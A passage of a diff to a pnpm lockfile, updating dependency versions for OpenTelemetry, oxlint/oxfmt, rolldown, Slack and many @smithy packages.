'@opentelemetry/otlp-transformer@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/api-logs': 0.212.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-logs': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-metrics': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-base': 2.5.1(@opentelemetry/api@1.9.0) - protobufjs: 8.0.0 + '@opentelemetry/api-logs': 0.213.0 + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-logs': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-metrics': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-base': 2.6.0(@opentelemetry/api@1.9.0) + protobufjs: 7.5.4 - '@opentelemetry/propagator-b3@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/propagator-b3@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/propagator-jaeger@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/propagator-jaeger@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/resources@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/resources@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/semantic-conventions': 1.40.0 - '@opentelemetry/sdk-logs@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/sdk-logs@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/api-logs': 0.212.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/api-logs': 0.213.0 + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/semantic-conventions': 1.40.0 - '@opentelemetry/sdk-metrics@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/sdk-metrics@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-node@0.212.0(@opentelemetry/api@1.9.0)': + '@opentelemetry/sdk-node@0.213.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/api-logs': 0.212.0 - '@opentelemetry/configuration': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/context-async-hooks': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-logs-otlp-grpc': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-logs-otlp-http': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-logs-otlp-proto': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-metrics-otlp-grpc': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-metrics-otlp-http': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-metrics-otlp-proto': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-prometheus': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-trace-otlp-grpc': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-trace-otlp-http': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-trace-otlp-proto': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/exporter-zipkin': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/instrumentation': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/propagator-b3': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/propagator-jaeger': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-logs': 0.212.0(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-metrics': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-base': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-node': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/api-logs': 0.213.0 + '@opentelemetry/configuration': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/context-async-hooks': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-logs-otlp-grpc': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-logs-otlp-http': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-logs-otlp-proto': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-metrics-otlp-grpc': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-metrics-otlp-http': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-metrics-otlp-proto': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-prometheus': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-trace-otlp-grpc': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-trace-otlp-http': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-trace-otlp-proto': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/exporter-zipkin': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/instrumentation': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/propagator-b3': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/propagator-jaeger': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-logs': 0.213.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-metrics': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-base': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-node': 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/semantic-conventions': 1.40.0 transitivePeerDependencies: - supports-color - '@opentelemetry/sdk-trace-base@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/sdk-trace-base@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/resources': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/resources': 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/semantic-conventions': 1.40.0 - '@opentelemetry/sdk-trace-node@2.5.1(@opentelemetry/api@1.9.0)': + '@opentelemetry/sdk-trace-node@2.6.0(@opentelemetry/api@1.9.0)': dependencies: '@opentelemetry/api': 1.9.0 - '@opentelemetry/context-async-hooks': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/core': 2.5.1(@opentelemetry/api@1.9.0) - '@opentelemetry/sdk-trace-base': 2.5.1(@opentelemetry/api@1.9.0) + '@opentelemetry/context-async-hooks': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/core': 2.6.0(@opentelemetry/api@1.9.0) + '@opentelemetry/sdk-trace-base': 2.6.0(@opentelemetry/api@1.9.0) '@opentelemetry/semantic-conventions@1.40.0': {} - '@oxc-project/types@0.114.0': {} + '@oxc-project/types@0.115.0': {} - '@oxfmt/binding-android-arm-eabi@0.35.0': + '@oxfmt/binding-android-arm-eabi@0.36.0': optional: true - '@oxfmt/binding-android-arm64@0.35.0': + '@oxfmt/binding-android-arm64@0.36.0': optional: true - '@oxfmt/binding-darwin-arm64@0.35.0': + '@oxfmt/binding-darwin-arm64@0.36.0': optional: true - '@oxfmt/binding-darwin-x64@0.35.0': + '@oxfmt/binding-darwin-x64@0.36.0': optional: true - '@oxfmt/binding-freebsd-x64@0.35.0': + '@oxfmt/binding-freebsd-x64@0.36.0': optional: true - '@oxfmt/binding-linux-arm-gnueabihf@0.35.0': + '@oxfmt/binding-linux-arm-gnueabihf@0.36.0': optional: true - '@oxfmt/binding-linux-arm-musleabihf@0.35.0': + '@oxfmt/binding-linux-arm-musleabihf@0.36.0': optional: true - '@oxfmt/binding-linux-arm64-gnu@0.35.0': + '@oxfmt/binding-linux-arm64-gnu@0.36.0': optional: true - '@oxfmt/binding-linux-arm64-musl@0.35.0': + '@oxfmt/binding-linux-arm64-musl@0.36.0': optional: true - '@oxfmt/binding-linux-ppc64-gnu@0.35.0': + '@oxfmt/binding-linux-ppc64-gnu@0.36.0': optional: true - '@oxfmt/binding-linux-riscv64-gnu@0.35.0': + '@oxfmt/binding-linux-riscv64-gnu@0.36.0': optional: true - '@oxfmt/binding-linux-riscv64-musl@0.35.0': + '@oxfmt/binding-linux-riscv64-musl@0.36.0': optional: true - '@oxfmt/binding-linux-s390x-gnu@0.35.0': + '@oxfmt/binding-linux-s390x-gnu@0.36.0': optional: true - '@oxfmt/binding-linux-x64-gnu@0.35.0': + '@oxfmt/binding-linux-x64-gnu@0.36.0': optional: true - '@oxfmt/binding-linux-x64-musl@0.35.0': + '@oxfmt/binding-linux-x64-musl@0.36.0': optional: true - '@oxfmt/binding-openharmony-arm64@0.35.0': + '@oxfmt/binding-openharmony-arm64@0.36.0': optional: true - '@oxfmt/binding-win32-arm64-msvc@0.35.0': + '@oxfmt/binding-win32-arm64-msvc@0.36.0': optional: true - '@oxfmt/binding-win32-ia32-msvc@0.35.0': + '@oxfmt/binding-win32-ia32-msvc@0.36.0': optional: true - '@oxfmt/binding-win32-x64-msvc@0.35.0': + '@oxfmt/binding-win32-x64-msvc@0.36.0': optional: true - '@oxlint-tsgolint/darwin-arm64@0.15.0': + '@oxlint-tsgolint/darwin-arm64@0.16.0': optional: true - '@oxlint-tsgolint/darwin-x64@0.15.0': + '@oxlint-tsgolint/darwin-x64@0.16.0': optional: true - '@oxlint-tsgolint/linux-arm64@0.15.0': + '@oxlint-tsgolint/linux-arm64@0.16.0': optional: true - '@oxlint-tsgolint/linux-x64@0.15.0': + '@oxlint-tsgolint/linux-x64@0.16.0': optional: true - '@oxlint-tsgolint/win32-arm64@0.15.0': + '@oxlint-tsgolint/win32-arm64@0.16.0': optional: true - '@oxlint-tsgolint/win32-x64@0.15.0': + '@oxlint-tsgolint/win32-x64@0.16.0': optional: true - '@oxlint/binding-android-arm-eabi@1.50.0': + '@oxlint/binding-android-arm-eabi@1.51.0': optional: true - '@oxlint/binding-android-arm64@1.50.0': + '@oxlint/binding-android-arm64@1.51.0': optional: true - '@oxlint/binding-darwin-arm64@1.50.0': + '@oxlint/binding-darwin-arm64@1.51.0': optional: true - '@oxlint/binding-darwin-x64@1.50.0': + '@oxlint/binding-darwin-x64@1.51.0': optional: true - '@oxlint/binding-freebsd-x64@1.50.0': + '@oxlint/binding-freebsd-x64@1.51.0': optional: true - '@oxlint/binding-linux-arm-gnueabihf@1.50.0': + '@oxlint/binding-linux-arm-gnueabihf@1.51.0': optional: true - '@oxlint/binding-linux-arm-musleabihf@1.50.0': + '@oxlint/binding-linux-arm-musleabihf@1.51.0': optional: true - '@oxlint/binding-linux-arm64-gnu@1.50.0': + '@oxlint/binding-linux-arm64-gnu@1.51.0': optional: true - '@oxlint/binding-linux-arm64-musl@1.50.0': + '@oxlint/binding-linux-arm64-musl@1.51.0': optional: true - '@oxlint/binding-linux-ppc64-gnu@1.50.0': + '@oxlint/binding-linux-ppc64-gnu@1.51.0': optional: true - '@oxlint/binding-linux-riscv64-gnu@1.50.0': + '@oxlint/binding-linux-riscv64-gnu@1.51.0': optional: true - '@oxlint/binding-linux-riscv64-musl@1.50.0': + '@oxlint/binding-linux-riscv64-musl@1.51.0': optional: true - '@oxlint/binding-linux-s390x-gnu@1.50.0': + '@oxlint/binding-linux-s390x-gnu@1.51.0': optional: true - '@oxlint/binding-linux-x64-gnu@1.50.0': + '@oxlint/binding-linux-x64-gnu@1.51.0': optional: true - '@oxlint/binding-linux-x64-musl@1.50.0': + '@oxlint/binding-linux-x64-musl@1.51.0': optional: true - '@oxlint/binding-openharmony-arm64@1.50.0': + '@oxlint/binding-openharmony-arm64@1.51.0': optional: true - '@oxlint/binding-win32-arm64-msvc@1.50.0': + '@oxlint/binding-win32-arm64-msvc@1.51.0': optional: true - '@oxlint/binding-win32-ia32-msvc@1.50.0': + '@oxlint/binding-win32-ia32-msvc@1.51.0': optional: true - '@oxlint/binding-win32-x64-msvc@1.50.0': + '@oxlint/binding-win32-x64-msvc@1.51.0': optional: true '@pierre/diffs@1.0.11(react-dom@19.2.4(react@19.2.4))(react@19.2.4)': @@ -8250,48 +9137,54 @@ snapshots: '@reflink/reflink-win32-x64-msvc': 0.1.19 optional: true - '@rolldown/binding-android-arm64@1.0.0-rc.5': + '@rolldown/binding-android-arm64@1.0.0-rc.7': optional: true - '@rolldown/binding-darwin-arm64@1.0.0-rc.5': + '@rolldown/binding-darwin-arm64@1.0.0-rc.7': optional: true - '@rolldown/binding-darwin-x64@1.0.0-rc.5': + '@rolldown/binding-darwin-x64@1.0.0-rc.7': optional: true - '@rolldown/binding-freebsd-x64@1.0.0-rc.5': + '@rolldown/binding-freebsd-x64@1.0.0-rc.7': optional: true - '@rolldown/binding-linux-arm-gnueabihf@1.0.0-rc.5': + '@rolldown/binding-linux-arm-gnueabihf@1.0.0-rc.7': optional: true - '@rolldown/binding-linux-arm64-gnu@1.0.0-rc.5': + '@rolldown/binding-linux-arm64-gnu@1.0.0-rc.7': optional: true - '@rolldown/binding-linux-arm64-musl@1.0.0-rc.5': + '@rolldown/binding-linux-arm64-musl@1.0.0-rc.7': optional: true - '@rolldown/binding-linux-x64-gnu@1.0.0-rc.5': + '@rolldown/binding-linux-ppc64-gnu@1.0.0-rc.7': optional: true - '@rolldown/binding-linux-x64-musl@1.0.0-rc.5': + '@rolldown/binding-linux-s390x-gnu@1.0.0-rc.7': optional: true - '@rolldown/binding-openharmony-arm64@1.0.0-rc.5': + '@rolldown/binding-linux-x64-gnu@1.0.0-rc.7': optional: true - '@rolldown/binding-wasm32-wasi@1.0.0-rc.5': + '@rolldown/binding-linux-x64-musl@1.0.0-rc.7': + optional: true + + '@rolldown/binding-openharmony-arm64@1.0.0-rc.7': + optional: true + + '@rolldown/binding-wasm32-wasi@1.0.0-rc.7': dependencies: '@napi-rs/wasm-runtime': 1.1.1 optional: true - '@rolldown/binding-win32-arm64-msvc@1.0.0-rc.5': + '@rolldown/binding-win32-arm64-msvc@1.0.0-rc.7': optional: true - '@rolldown/binding-win32-x64-msvc@1.0.0-rc.5': + '@rolldown/binding-win32-x64-msvc@1.0.0-rc.7': optional: true - '@rolldown/pluginutils@1.0.0-rc.5': {} + '@rolldown/pluginutils@1.0.0-rc.7': {} '@rollup/rollup-android-arm-eabi@4.59.0': optional: true @@ -8449,14 +9342,14 @@ snapshots: '@slack/logger@4.0.0': dependencies: - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@slack/oauth@3.0.4': dependencies: '@slack/logger': 4.0.0 '@slack/web-api': 7.14.1 '@types/jsonwebtoken': 9.0.10 - '@types/node': 25.3.3 + '@types/node': 25.3.5 jsonwebtoken: 9.0.3 transitivePeerDependencies: - debug @@ -8465,7 +9358,7 @@ snapshots: dependencies: '@slack/logger': 4.0.0 '@slack/web-api': 7.14.1 - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/ws': 8.18.1 eventemitter3: 5.0.4 ws: 8.19.0 @@ -8480,7 +9373,7 @@ snapshots: dependencies: '@slack/logger': 4.0.0 '@slack/types': 2.20.0 - '@types/node': 25.3.3 + '@types/node': 25.3.5 '@types/retry': 0.12.0 axios: 1.13.5 eventemitter3: 5.0.4 @@ -8498,6 +9391,11 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/abort-controller@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/chunked-blob-reader-native@4.2.2': dependencies: '@smithy/util-base64': 4.3.1 @@ -8507,6 +9405,15 @@ snapshots: dependencies: tslib: 2.8.1 + '@smithy/config-resolver@4.4.10': + dependencies: + '@smithy/node-config-provider': 4.3.11 + '@smithy/types': 4.13.0 + '@smithy/util-config-provider': 4.2.2 + '@smithy/util-endpoints': 3.3.2 + '@smithy/util-middleware': 4.2.11 + tslib: 2.8.1 + '@smithy/config-resolver@4.4.9': dependencies: '@smithy/node-config-provider': 4.3.10 @@ -8529,6 +9436,19 @@ snapshots: '@smithy/uuid': 1.1.1 tslib: 2.8.1 + '@smithy/core@3.23.9': + dependencies: + '@smithy/middleware-serde': 4.2.12 + '@smithy/protocol-http': 5.3.11 + '@smithy/types': 4.13.0 + '@smithy/util-base64': 4.3.2 + '@smithy/util-body-length-browser': 4.2.2 + '@smithy/util-middleware': 4.2.11 + '@smithy/util-stream': 4.5.17 + '@smithy/util-utf8': 4.2.2 + '@smithy/uuid': 1.1.2 + tslib: 2.8.1 + '@smithy/credential-provider-imds@4.2.10': dependencies: '@smithy/node-config-provider': 4.3.10 @@ -8537,6 +9457,14 @@ snapshots: '@smithy/url-parser': 4.2.10 tslib: 2.8.1 + '@smithy/credential-provider-imds@4.2.11': + dependencies: + '@smithy/node-config-provider': 4.3.11 + '@smithy/property-provider': 4.2.11 + '@smithy/types': 4.13.0 + '@smithy/url-parser': 4.2.11 + tslib: 2.8.1 + '@smithy/eventstream-codec@4.2.10': dependencies: '@aws-crypto/crc32': 5.2.0 @@ -8575,6 +9503,14 @@ snapshots: '@smithy/util-base64': 4.3.1 tslib: 2.8.1 + '@smithy/fetch-http-handler@5.3.13': + dependencies: + '@smithy/protocol-http': 5.3.11 + '@smithy/querystring-builder': 4.2.11 + '@smithy/types': 4.13.0 + '@smithy/util-base64': 4.3.2 + tslib: 2.8.1 + '@smithy/hash-blob-browser@4.2.11': dependencies: '@smithy/chunked-blob-reader': 5.2.1 @@ -8589,6 +9525,13 @@ snapshots: '@smithy/util-utf8': 4.2.1 tslib: 2.8.1 + '@smithy/hash-node@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + '@smithy/util-buffer-from': 4.2.2 + '@smithy/util-utf8': 4.2.2 + tslib: 2.8.1 + '@smithy/hash-stream-node@4.2.10': dependencies: '@smithy/types': 4.13.0 @@ -8600,6 +9543,11 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/invalid-dependency@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/is-array-buffer@2.2.0': dependencies: tslib: 2.8.1 @@ -8608,6 +9556,10 @@ snapshots: dependencies: tslib: 2.8.1 + '@smithy/is-array-buffer@4.2.2': + dependencies: + tslib: 2.8.1 + '@smithy/md5-js@4.2.10': dependencies: '@smithy/types': 4.13.0 @@ -8620,6 +9572,12 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/middleware-content-length@4.2.11': + dependencies: + '@smithy/protocol-http': 5.3.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/middleware-endpoint@4.4.20': dependencies: '@smithy/core': 3.23.6 @@ -8631,6 +9589,17 @@ snapshots: '@smithy/util-middleware': 4.2.10 tslib: 2.8.1 + '@smithy/middleware-endpoint@4.4.23': + dependencies: + '@smithy/core': 3.23.9 + '@smithy/middleware-serde': 4.2.12 + '@smithy/node-config-provider': 4.3.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + '@smithy/url-parser': 4.2.11 + '@smithy/util-middleware': 4.2.11 + tslib: 2.8.1 + '@smithy/middleware-retry@4.4.37': dependencies: '@smithy/node-config-provider': 4.3.10 @@ -8643,17 +9612,40 @@ snapshots: '@smithy/uuid': 1.1.1 tslib: 2.8.1 + '@smithy/middleware-retry@4.4.40': + dependencies: + '@smithy/node-config-provider': 4.3.11 + '@smithy/protocol-http': 5.3.11 + '@smithy/service-error-classification': 4.2.11 + '@smithy/smithy-client': 4.12.3 + '@smithy/types': 4.13.0 + '@smithy/util-middleware': 4.2.11 + '@smithy/util-retry': 4.2.11 + '@smithy/uuid': 1.1.2 + tslib: 2.8.1 + '@smithy/middleware-serde@4.2.11': dependencies: '@smithy/protocol-http': 5.3.10 '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/middleware-serde@4.2.12': + dependencies: + '@smithy/protocol-http': 5.3.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/middleware-stack@4.2.10': dependencies: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/middleware-stack@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/node-config-provider@4.3.10': dependencies: '@smithy/property-provider': 4.2.10 @@ -8661,6 +9653,13 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/node-config-provider@4.3.11': + dependencies: + '@smithy/property-provider': 4.2.11 + '@smithy/shared-ini-file-loader': 4.4.6 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/node-http-handler@4.4.12': dependencies: '@smithy/abort-controller': 4.2.10 @@ -8669,36 +9668,74 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/node-http-handler@4.4.14': + dependencies: + '@smithy/abort-controller': 4.2.11 + '@smithy/protocol-http': 5.3.11 + '@smithy/querystring-builder': 4.2.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/property-provider@4.2.10': dependencies: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/property-provider@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/protocol-http@5.3.10': dependencies: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/protocol-http@5.3.11': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/querystring-builder@4.2.10': dependencies: '@smithy/types': 4.13.0 '@smithy/util-uri-escape': 4.2.1 tslib: 2.8.1 + '@smithy/querystring-builder@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + '@smithy/util-uri-escape': 4.2.2 + tslib: 2.8.1 + '@smithy/querystring-parser@4.2.10': dependencies: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/querystring-parser@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/service-error-classification@4.2.10': dependencies: '@smithy/types': 4.13.0 + '@smithy/service-error-classification@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + '@smithy/shared-ini-file-loader@4.4.5': dependencies: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/shared-ini-file-loader@4.4.6': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/signature-v4@5.3.10': dependencies: '@smithy/is-array-buffer': 4.2.1 @@ -8710,6 +9747,17 @@ snapshots: '@smithy/util-utf8': 4.2.1 tslib: 2.8.1 + '@smithy/signature-v4@5.3.11': + dependencies: + '@smithy/is-array-buffer': 4.2.2 + '@smithy/protocol-http': 5.3.11 + '@smithy/types': 4.13.0 + '@smithy/util-hex-encoding': 4.2.2 + '@smithy/util-middleware': 4.2.11 + '@smithy/util-uri-escape': 4.2.2 + '@smithy/util-utf8': 4.2.2 + tslib: 2.8.1 + '@smithy/smithy-client@4.12.0': dependencies: '@smithy/core': 3.23.6 @@ -8720,6 +9768,16 @@ snapshots: '@smithy/util-stream': 4.5.15 tslib: 2.8.1 + '@smithy/smithy-client@4.12.3': + dependencies: + '@smithy/core': 3.23.9 + '@smithy/middleware-endpoint': 4.4.23 + '@smithy/middleware-stack': 4.2.11 + '@smithy/protocol-http': 5.3.11 + '@smithy/types': 4.13.0 + '@smithy/util-stream': 4.5.17 + tslib: 2.8.1 + '@smithy/types@4.13.0': dependencies: tslib: 2.8.1 @@ -8730,20 +9788,40 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/url-parser@4.2.11': + dependencies: + '@smithy/querystring-parser': 4.2.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/util-base64@4.3.1': dependencies: '@smithy/util-buffer-from': 4.2.1 '@smithy/util-utf8': 4.2.1 tslib: 2.8.1 + '@smithy/util-base64@4.3.2': + dependencies: + '@smithy/util-buffer-from': 4.2.2 + '@smithy/util-utf8': 4.2.2 + tslib: 2.8.1 + '@smithy/util-body-length-browser@4.2.1': dependencies: tslib: 2.8.1 + '@smithy/util-body-length-browser@4.2.2': + dependencies: + tslib: 2.8.1 + '@smithy/util-body-length-node@4.2.2': dependencies: tslib: 2.8.1 + '@smithy/util-body-length-node@4.2.3': + dependencies: + tslib: 2.8.1 + '@smithy/util-buffer-from@2.2.0': dependencies: '@smithy/is-array-buffer': 2.2.0 @@ -8754,10 +9832,19 @@ snapshots: '@smithy/is-array-buffer': 4.2.1 tslib: 2.8.1 + '@smithy/util-buffer-from@4.2.2': + dependencies: + '@smithy/is-array-buffer': 4.2.2 + tslib: 2.8.1 + '@smithy/util-config-provider@4.2.1': dependencies: tslib: 2.8.1 + '@smithy/util-config-provider@4.2.2': + dependencies: + tslib: 2.8.1 + '@smithy/util-defaults-mode-browser@4.3.36': dependencies: '@smithy/property-provider': 4.2.10 @@ -8765,6 +9852,13 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/util-defaults-mode-browser@4.3.39': + dependencies: + '@smithy/property-provider': 4.2.11 + '@smithy/smithy-client': 4.12.3 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/util-defaults-mode-node@4.2.39': dependencies: '@smithy/config-resolver': 4.4.9 @@ -8775,27 +9869,58 @@ snapshots: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/util-defaults-mode-node@4.2.42': + dependencies: + '@smithy/config-resolver': 4.4.10 + '@smithy/credential-provider-imds': 4.2.11 + '@smithy/node-config-provider': 4.3.11 + '@smithy/property-provider': 4.2.11 + '@smithy/smithy-client': 4.12.3 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/util-endpoints@3.3.1': dependencies: '@smithy/node-config-provider': 4.3.10 '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/util-endpoints@3.3.2': + dependencies: + '@smithy/node-config-provider': 4.3.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/util-hex-encoding@4.2.1': dependencies: tslib: 2.8.1 + '@smithy/util-hex-encoding@4.2.2': + dependencies: + tslib: 2.8.1 + '@smithy/util-middleware@4.2.10': dependencies: '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/util-middleware@4.2.11': + dependencies: + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/util-retry@4.2.10': dependencies: '@smithy/service-error-classification': 4.2.10 '@smithy/types': 4.13.0 tslib: 2.8.1 + '@smithy/util-retry@4.2.11': + dependencies: + '@smithy/service-error-classification': 4.2.11 + '@smithy/types': 4.13.0 + tslib: 2.8.1 + '@smithy/util-stream@4.5.15': dependencies: '@smithy/fetch-http-handler': 5.3.11 @@ -8807,10 +9932,25 @@ snapshots: '@smithy/util-utf8': 4.2.1 tslib: 2.8.1 + '@smithy/util-stream@4.5.17': + dependencies: + '@smithy/fetch-http-handler': 5.3.13 + '@smithy/node-http-handler': 4.4.14 + '@smithy/types': 4.13.0 + '@smithy/util-base64': 4.3.2 + '@smithy/util-buffer-from': 4.2.2 + '@smithy/util-hex-encoding': 4.2.2 + '@smithy/util-utf8': 4.2.2 + tslib: 2.8.1 + '@smithy/util-uri-escape@4.2.1': dependencies: tslib: 2.8.1 + '@smithy/util-uri-escape@4.2.2': + dependencies: + tslib: 2.8.1 + '@smithy/util-utf8@2.3.0': dependencies: '@smithy/util-buffer-from': 2.2.0 @@ -8821,6 +9961,11 @@ snapshots: '@smithy/util-buffer-from': 4.2.1 tslib: 2.8.1 + '@smithy/util-utf8@4.2.2': + dependencies: + '@smithy/util-buffer-from': 4.2.2 + tslib: 2.8.1 + '@smithy/util-waiter@4.2.10': dependencies: '@smithy/abort-controller': 4.2.10 @@ -8831,6 +9976,10 @@ snapshots: dependencies: tslib: 2.8.1 + '@smithy/uuid@1.1.2': + dependencies: + tslib: 2.8.1 + '@snazzah/davey-android-arm-eabi@0.1.9': optional: true @@ -8908,7 +10057,7 @@ snapshots: '@tinyhttp/content-disposition@2.2.4': {} - 